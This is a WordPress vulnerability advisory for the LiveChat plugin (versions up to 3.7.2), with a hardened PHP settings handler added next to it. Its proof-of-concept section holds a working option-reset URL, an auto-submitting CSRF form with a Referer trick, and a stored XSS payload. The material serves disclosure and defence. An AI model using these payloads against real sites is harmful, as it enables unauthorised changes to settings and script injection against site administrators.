LiveChat <= 3.7.2 - Unauthenticated Option Update/Reset and Stored XSS
Description
The lack of proper CSRF and authorisation checks could allow an unauthenticated attacker to update or reset the plugin's settings. Furthermore, when the livechat_email option is updated, no sanitisation is performed, leading to a stored XSS in the plugin's settings page.

The CSRF and XSS issues were fixed in 3.7.3; however, for the authorisation part the fix only added an is_admin() check, which merely tests whether a dashboard/admin-panel page is being served, not whether the requesting user is authenticated or privileged. The author was notified on July 2nd but has not responded or fixed the latter.
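The following is an added example, not the plugin's code, showing what a settings handler on admin-ajax.php needs in order to close the three gaps described above: a nonce check against CSRF, a capability check instead of is_admin(), and sanitisation of the stored email plus escaping on output. The weak pattern at the top is reconstructed from the description in this advisory, not copied from the plugin. The hook name livechat_example_save, the nonce action livechat_settings_save, the nonce field name security and the option name livechat_license are assumptions; livechat_email is the option named on this page.

```php
<?php
/*
 * Added example (not the plugin's code). Hook name, nonce action, nonce field
 * and the 'livechat_license' option name are assumptions for illustration.
 */

// Weak pattern, reconstructed from the advisory's description (NOT the plugin's code).
// is_admin() is true for every request routed through /wp-admin/admin-ajax.php,
// including unauthenticated ones, and a substring test on the Referer header
// checks a value the client controls. Neither is an authorisation check.
function livechat_example_weak_save() {
    if ( ! is_admin() ) {
        return;
    }
    if ( isset( $_GET['reset'] ) ) {
        delete_option( 'livechat_email' );
    }
    if ( isset( $_POST['licenseEmail'] ) ) {
        update_option( 'livechat_email', $_POST['licenseEmail'] ); // stored unsanitised
    }
}

// Hardened handler.
function livechat_example_secure_save() {
    // 1. CSRF: the request must carry a nonce bound to this action and the
    //    current user's session. check_ajax_referer() terminates the request
    //    (response "-1") when the nonce is missing or invalid.
    check_ajax_referer( 'livechat_settings_save', 'security' );

    // 2. Authorisation: a real capability check. Only users allowed to manage
    //    options may change or reset plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // Reset is an explicit POST parameter, never a bare GET query string.
    if ( ! empty( $_POST['reset'] ) ) {
        delete_option( 'livechat_email' );
        delete_option( 'livechat_license' );
        wp_send_json_success( array( 'reset' => true ) );
    }

    // 3. Input validation: keep only a well-formed address. sanitize_email()
    //    strips characters that are illegal in an email address, so a payload
    //    such as a closing quote followed by a tag cannot reach the database.
    $email = isset( $_POST['licenseEmail'] )
        ? sanitize_email( wp_unslash( $_POST['licenseEmail'] ) )
        : '';
    if ( '' === $email || ! is_email( $email ) ) {
        wp_send_json_error( array( 'message' => 'invalid email address' ), 400 );
    }
    update_option( 'livechat_email', $email );

    $license = isset( $_POST['licenseNumber'] )
        ? sanitize_text_field( wp_unslash( $_POST['licenseNumber'] ) )
        : '';
    update_option( 'livechat_license', $license );

    wp_send_json_success( array( 'email' => $email ) );
}

// Registered for logged-in users only: there is deliberately no
// wp_ajax_nopriv_ counterpart, so anonymous requests never reach the handler.
add_action( 'wp_ajax_livechat_example_save', 'livechat_example_secure_save' );

// Settings page fragment. Escaping on output is the second line of defence:
// even a value that reached the database unsanitised is rendered inert here.
function livechat_example_settings_field() {
    $email = get_option( 'livechat_email', '' );
    echo '<input type="email" name="licenseEmail" value="' . esc_attr( $email ) . '" />';
    wp_nonce_field( 'livechat_settings_save', 'security' );
}
```

The weak function is never hooked in this example; it is there only to show why is_admin() and a Referer substring test do not distinguish an administrator from an anonymous visitor. The hardened handler layers three independent controls, so a single missed check (for instance a nonce leaked via a logged URL) does not by itself reopen the issue.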
Proof of Concept
Unauthenticated Option Reset:
https://<BLOG>/wp-admin/admin-ajax.php?reset=1&page=livechat_settings

Unauthenticated Option Update (make sure the Referer of the request contains livechat_settings, for example "Referer: livechat_settings"):

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="licenseNumber" value="42"/>
      <input type="hidden" name="licenseEmail" value="whatever"/>
    </form>
  </body>
</html>

Unauthenticated Stored XSS:
Like the PoC above, but replace the licenseEmail value by "><svg/onload=alert(/XSS/)>

References

URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2113080%40wp-live-chat-software-for-wordpress&old=2103185%40wp-live-chat-software-for-wordpress

Classification

Type MULTI

Miscellaneous

Verified No
WPVDB ID 9441

Timeline

Publicly Published 2019-06-26
Added 2019-07-09
Last Updated 2019-07-09
